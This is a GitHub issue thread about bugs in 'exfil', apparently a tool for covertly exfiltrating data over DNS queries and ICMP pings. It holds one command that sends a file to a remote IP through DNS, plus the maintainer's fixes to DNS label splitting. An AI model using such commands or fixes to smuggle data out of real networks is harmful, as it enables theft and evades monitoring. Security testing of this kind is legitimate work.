### ISSUE TITLE
file transfer fails

### ISSUE THREAD

**Issue by 0xtf** [averagesecurityguy/exfil#2]
Hi,

When using exfil to send a string, it works fine, however, when attempting to send a file, the following error is given:

```
./exfil.py -s IP -p 5353 -f LICENSE dns_lookup
Sending data via DNS to 52.213.66.81 on port 5353.
Data Sent:
Copyright (c) 2014, LCI Technology Group, LLC
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

 
Traceback (most recent call last):
  File "./exfil.py", line 53, in <module>
    m.send(args.s, args.p, data)
  File "/tmp/exfil-master/lib/dns_lookup.py", line 36, in send
    network.send_dns_query(server, port, enc)
  File "/tmp/exfil-master/lib/network.py", line 74, in send_dns_query
    q.send(server, port=port, timeout=1)
  File "/usr/local/lib/python2.7/dist-packages/dnslib/dns.py", line 351, in send
    data = self.pack()
  File "/usr/local/lib/python2.7/dist-packages/dnslib/dns.py", line 316, in pack
    q.pack(buffer)
  File "/usr/local/lib/python2.7/dist-packages/dnslib/dns.py", line 664, in pack
    buffer.encode_name(self.qname)
  File "/usr/local/lib/python2.7/dist-packages/dnslib/label.py", line 254, in encode_name
    raise DNSLabelError("Domain label too long: %r" % name)
dnslib.label.DNSLabelError: Domain label too long: <DNSLabel: 'IyBDb3B5cmlnaHQgKGMpIDIwMTQsIExDSSBUZWNobm9sb2d5IEdyb3VwLCBMTEMKIyBBbGwgcmlnaHRzIHJlc2VydmVkLgojCiMgUmVkaXN0cmlidXRpb24gYW5kIHVzZSBpbiBzb3VyY2UgYW5kIGJpbmFyeSBmb3Jtcywgd2l0aCBvciB3aXRob3V0CiMgbW9kaWZpY2F0aW9uLCBhcmUgcGVybWl0dGVkIHByb3ZpZGVkIHRoYXQgdGhlIGZvbGxvd2luZyBjb25kaXRpb25zIGFyZSBtZXQ6CiMKIyA=.'>
```

Details:

```
pip show dpkt
---
Name: dpkt
Version: 1.9.0
Location: /usr/local/lib/python2.7/dist-packages
```

```
pip show dnslib
---
Name: dnslib
Version: 0.9.7
Location: /usr/local/lib/python2.7/dist-packages
```

Attempting to use **ping_data** will also generate an error:

`...
  File "/usr/local/lib/python2.7/dist-packages/dpkt/icmp.py", line 130, in __bytes__
    self.sum = dpkt.in_cksum(dpkt.Packet.__str__(self))
  File "/usr/local/lib/python2.7/dist-packages/dpkt/dpkt.py", line 141, in __str__
    return str(self.__bytes__())
  File "/usr/local/lib/python2.7/dist-packages/dpkt/icmp.py", line 130, in __bytes__
    self.sum = dpkt.in_cksum(dpkt.Packet.__str__(self))
  File "/usr/local/lib/python2.7/dist-packages/dpkt/dpkt.py", line 141, in __str__
    return str(self.__bytes__())
...`

Due to recent Python version? Thank you!

**Comment by averagesecurityguy** [comment]
The dns_lookup module has a BLOCK_SIZE constant. Did you make any changes to it? How large is the file you are trying to transfer?

Can you repost the full stack trace for the ping_data error?

**Comment by 0xtf** [comment]
No changes made. The file that I'm trying to send is actually the LICENSE file from this repo. Details:

`4.0K	LICENSE
`

The traceback: Github is actually freaking out with the whole thing, so I've pasted it on pastebin:

https://pastebin.com/1GUZRPWy

**Comment by averagesecurityguy** [comment]
Fix DNSLabelError by adjusting the BLOCK_SIZE https://github.com/averagesecurityguy/exfil/commit/1f517c646153da5f90341f49fd9212b8d9d982b6

**Comment by 0xtf** [comment]
Will re-test in a few hours and report back.

**Comment by averagesecurityguy** [comment]
The ping_data issue is a recursion error in the dpkt 1.9.0 library, use 1.8.8 instead.
sudo pip install dpkt==1.8.8

**Comment by averagesecurityguy** [comment]
Not only does the query name have to be less than 253 characters, each part of the name can be a max of 63 characters. Working on a fix.

**Comment by averagesecurityguy** [comment]
Now the DNS issue is fixed. :) https://github.com/averagesecurityguy/exfil/commit/669530572ea286eb681d8eaeff7c0956e5fa8bd1
